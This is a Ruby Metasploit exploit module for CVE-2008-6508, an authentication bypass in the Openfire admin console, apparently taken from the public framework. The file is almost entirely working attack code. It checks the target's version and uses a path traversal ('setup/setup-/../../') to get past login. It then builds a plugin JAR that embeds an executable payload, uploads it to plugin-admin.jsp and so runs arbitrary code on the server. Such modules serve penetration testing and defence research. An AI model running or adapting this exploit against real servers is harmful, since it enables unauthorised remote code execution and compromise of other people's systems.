## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/zip' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { pattern: [ /(Jetty)/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'Openfire Admin Console Authentication Bypass', 'Description' => %q{ This module exploits an authentication bypass vulnerability in the administration console of Openfire servers. By using this vulnerability it is possible to upload/execute a malicious Openfire plugin on the server and execute arbitrary Java code. This module has been tested against Openfire 3.6.0a. It is possible to remove the uploaded plugin after execution, however this might turn the server in some kind of unstable state, making re-exploitation difficult. You might want to do this manually. }, 'Author' => [ 'Andreas Kurtz', # Vulnerability discovery 'h0ng10' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2008-6508' ], [ 'OSVDB', '49663' ], [ 'BID', '32189' ], [ 'EDB', '7075' ], [ 'URL', 'http://community.igniterealtime.org/thread/35874' ] ], 'DisclosureDate' => '2008-11-10', 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ # # Java version # [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ], # # Platform specific targets # [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86 } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_options( [ Opt::RPORT(9090), OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]), OptString.new('PLUGINAUTHOR', [ false, 'Openfire plugin author, (default: random)' ]), OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]), OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]), ] ) end def post_auth? true end def check base = target_uri.path base << '/' if base[-1, 1] != '/' path = normalize_uri(base, 'login.jsp') res = send_request_cgi( { 'uri' => path } ) if (!res) or (res.code != 200) vprint_error("Unable to make a request to: #{path}") return Exploit::CheckCode::Unknown('Failed to fetch the login page') end versioncheck = res.body =~ %r{Openfire, \D*: (\d)\.(\d).(\d)\s*} if versioncheck.nil? vprint_error('Unable to detect Openfire version') return Exploit::CheckCode::Unknown('Unable to determine Openfire version from response') end vprint_status("Detected version: #{::Regexp.last_match(1)}.#{::Regexp.last_match(2)}.#{::Regexp.last_match(3)}") version = "#{::Regexp.last_match(1)}#{::Regexp.last_match(2)}#{::Regexp.last_match(3)}".to_i return Exploit::CheckCode::Safe('The target is not running a vulnerable version') if version > 360 # Just to be sure, try to access the log page path = "#{base}setup/setup-/../../log.jsp" res = send_request_cgi( { 'uri' => path } ) if (!res) or (res.code != 200) print_error("Failed: Error requesting #{path}") return Exploit::CheckCode::Unknown('An error occurred while checking the target') end Exploit::CheckCode::Appears('The target appears to be a vulnerable version') end def get_plugin_jar(plugin_name) files = [ [ 'logo_large.gif' ], [ 'logo_small.gif' ], [ 'readme.html' ], [ 'changelog.html' ], [ 'lib', 'plugin-metasploit.jar' ] ] jar = Rex::Zip::Jar.new jar.add_files(files, File.join(Msf::Config.data_directory, 'exploits', 'openfire_plugin')) plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(rand(8..15)) plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(rand(8..15)) plugin_xml = File.open(File.join(Msf::Config.data_directory, 'exploits', 'openfire_plugin', 'plugin.xml'), 'rb') { |fd| fd.read } plugin_xml.gsub!(/PLUGINNAME/, plugin_name) plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) jar.add_file('plugin.xml', plugin_xml) jar end def exploit base = normalize_uri(target_uri.path) base << '/' if base[-1, 1] != '/' plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(rand(8..15)) plugin = get_plugin_jar(plugin_name) arch = target.arch plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]] if (exploit_regenerate_payload(plat, arch)).nil? print_error('Failed to regenerate payload') return end plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack) plugin.build_manifest # Upload the plugin to the server print_status("Uploading plugin #{plugin_name} to the server") boundary = rand_text_alphanumeric(6) data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"uploadfile\"; " data << "filename=\"#{plugin_name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n" data << plugin.pack data << "\r\n--#{boundary}--" res = send_request_cgi({ 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), 'method' => 'POST', 'data' => data, 'encode_params' => false, 'headers' => { 'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Content-Length' => data.length, 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}" }, 'vars_get' => { 'uploadplugin' => nil } }) print_warning('Warning: got no response from the upload, continuing...') if !res # Delete the uploaded JAR file if datastore['REMOVE_PLUGIN'] print_status("Deleting plugin #{plugin_name} from the server") res = send_request_cgi({ 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), 'encode_params' => false, 'headers' => { 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}" }, 'vars_get' => { 'deleteplugin' => plugin_name.downcase } }) if !res print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.") end end end end